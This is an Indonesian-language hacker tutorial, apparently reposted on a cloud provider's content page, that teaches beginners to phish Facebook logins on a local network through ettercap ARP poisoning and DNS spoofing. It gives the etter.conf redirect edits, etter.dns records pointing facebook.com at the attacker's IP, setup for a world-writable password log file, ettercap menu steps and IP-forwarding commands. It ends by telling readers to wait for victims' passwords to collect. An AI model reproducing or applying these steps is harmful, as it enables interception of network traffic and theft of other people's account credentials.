Implementasi Pishing Dengan Teknik DNS Spoofing

Source: Internet
Author: User
Tags dns spoofing pishing

 

Title: Implementasi Pishing Dengan Teknik DNS Spoffing

Author: yur4kh4 www.2cto.com

Website: http://www.devirakhjib.co.cc/

Language: Indonesian

Test Platform: ubuntu 10.4 (lucid)

------------------------------------------------------------------/

[*] Berpatah-patah Kata

Tulisan ini di khususkan untuk para newbie

Di kemas dengan sedikit bahasa 4la4y... ahahaha... namun tetap menjunjung tinggi ide0logi ketampanan... wekzz .,.,

Mohon maav sy sampai kan di awal tulisan, karena sy sadar sangat banyak sekali kekurangan dalam tulisan ini...

Kekurangan itu tidak lepas dari keterbatasan, ilmu pengetahuan sy,... & kehendak yang maha kuasa ..,.: p

 

[@] Persiapan

Implementasi pishing dengan teknik DNS spoffing ..

Teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita...: P

Yang perlu kita siapkan ..

1. apache server <sudo apt-get install apache2>

2. php <sudo apt-get install php5>

3. ettercap <sudo apt-get install ettercap>

4. script pishing <cari di google or buat sendiri... or conntact sy... whatever do U want wes...: D>

5. mental yg kuat & sedang tidak dalam keadaan mabuk. akakakaka .,.

 

Sy anggap semua peralatan sudah di install ..

Cek apache2 yg di install tadi, ketik "localhost" pada web browser ente yang ganteng2.,.: D

Klo ada tulisan "its works" <tandanya installasi berlang?mulus... yeess ,,,

File index default dari server apache ada di/var/www

Klo ga percaya cek saja...: D

Yur4 @ localhost/var/www $ ls

Index.html

Tuch kan... cb buka file index nya...: p... wekz...,. bener kan kata sy...: p

Wokey... cukup main-mainnya...

 

[@] Configure

 

Konfigurasi ettercap <ini paling penting>

Tempat konfigurasinya ada di/etc/etter. conf

Yur4 @ localhost $ sudo gedit/etc/etter. conf

Maka akan membuka file etter. conf dengan menggunakan gedit ..

Selanjutnya cari

#---------------

# Linux

#---------------

 

# If you use ipchains:

# Redir_command_on = "ipchains-A input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"

# Redir_command_off = "ipchains-D input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"

 

# If you use iptables:

# Redir_command_on = "iptables-t nat-a prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"

# Redir_command_off = "iptables-t nat-d prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"

 

Hilangkan tanda pagarnya .. sehingga menjadi sepert ini

#---------------

# Linux

#---------------

 

# If you use ipchains:

Redir_command_on = "ipchains-A input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"

Redir_command_off = "ipchains-D input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"

 

# If you use iptables:

Redir_command_on = "iptables-t nat-a prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"

Redir_command_off = "iptables-t nat-d prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"

 

Penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan... script

Kalo sudah save... & jangan di ingat-ingat lagi... ahahahaa

Selanjutnya ..

Rubah file etter. dns yang terdapat di/usr/share/ettercap

Yur4 @ localhost $ gedit/usr/share/ettercap/etter. dns

Delete isi etter. dns defaultnya & ganti menjadi seperti ini

================================ Cut here ============== ==============================

Facebook.com A 10.10.10.6

* .Facebook.com A 10.10.10.6

Www.facebook.com PTR 10.10.10.6 # Wildcards in PTR are not allowed

================================ Cut here ============== ==============================

Sedikit penjelease

Facebook.com = site yang akan kita pishing

10.10.10.6 = IP attacker

NB:

Untuk melihat ip

Yur4 @ localhost $ ifconfig

Kemudian save...

 

Selanjutnya... copy file-file pishing kita k/var/www

Biasanya ada 3 file .. index. php terserah.txt logs. php

Sebelumnya di hapus aja dulu index.html defaultnya y...

Beri perintah gini di file terserah.txt agar bisa di eksekusi ..

Root @ localhost/var/www $ touch terserah.txt

Root @ localhost/var/www $ chmod 777 terserah.txt

Wokeyy... saya anggap sudah di copy y...

 

[@] Eksekusi

 

Next... buka ettercap ente ..

Sekedar berbagi pengalaman sajjha .. klo sy lebih suka membuka ettercap menggunakan mode console...: D

 

Yur4 @ localhost $ sudo ettercap-C = mode/-I = intercafe <nama network card>

-C bisa di ganti dengan-G = mode gui-T = mode text ..

Misal:

Yur4 @ localhost $ ettercap-C-I eth0

 

Sy akan melakukan sniffing pada network card LAN (local area network)

Di sesuaikan sajjha dengan network card yg activ di leppy or PC ente ..

Next...

Pilih tab "sniff"> uniied sniffing> pilih network card yg aktiv... [enter]

Selanjutnya pada tab "host"> scan host ....

Kemudia berangkat k tab "plugins"> manage the plugins

Aktivkan autoadd & dns_spoff

Selanjutnya pada tab "mitm"> arp attack oning... [centang/enter]

Kemudia terakhir ke tab "start"> start sniffing ...:)

Wew., rumit dech kyx ych ..,. hee... ngga 'kq sebenarnya ..,. klo dh biasa ga rumit kq ..: p

Jangan senang dulu haruz ada 1 hal lagi di lakukan...: p

Yaitu meng-forward ip/berpura2 menjadi server lach..., wekzz .,..

Langdesksajjha... masuk ke terminal ketikan perintah ini ..

Yur4 @ localhost $ sudo nano/proc/sys/net/ipv4/ip_forward

Password: masukan password ente ..

Ganti angka 0 dengan angka 1 kemudian save... (ctrl + x> y> enter)

 

[@] Penutup

 

Sippzzz... tinggal tunggu az dech...: p

Lakukan dengan teman anda agar bisa lang?melihat hasilnya... tp kalo ga percaya...

Silahkan buka facebook.com

Login dech ..

Seperti biasa password akan tersimpan di terserah.txt

Bisa lihat di http: // localhost/terserah.txt

 

Tulisan ini sangat susah di mengerti... ahaha... sy yang nuliz az bingung aplgi kalian yang baca ..,.: p

Klo memang seriuz... conntact saja sy... pai_^... tanyakan semua yang belum jelas...

& Mudah-mudahan sy bisa jawab yach ..,. amin ..,.: p

 

+++ ++ Thankz t0 ++ ++

[&] Allah, muhammad, & seluruh pengikutnya...

[!] Malang Cyber Crew-kill-9-Indonesian coder

[%] Arianom, Tukulesto, marahmerah, kamtiez, vYc0d, xr0b0t

Contrex, mboys, Pathloader, rifle Ky, Thunder x c0de, jundab

Ibl13z, geni212, dhomas, kalong666, ichal, tucker,

 

& ** Akulukasaatkaupergi **&&

++ Luv der4 ++ ++

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.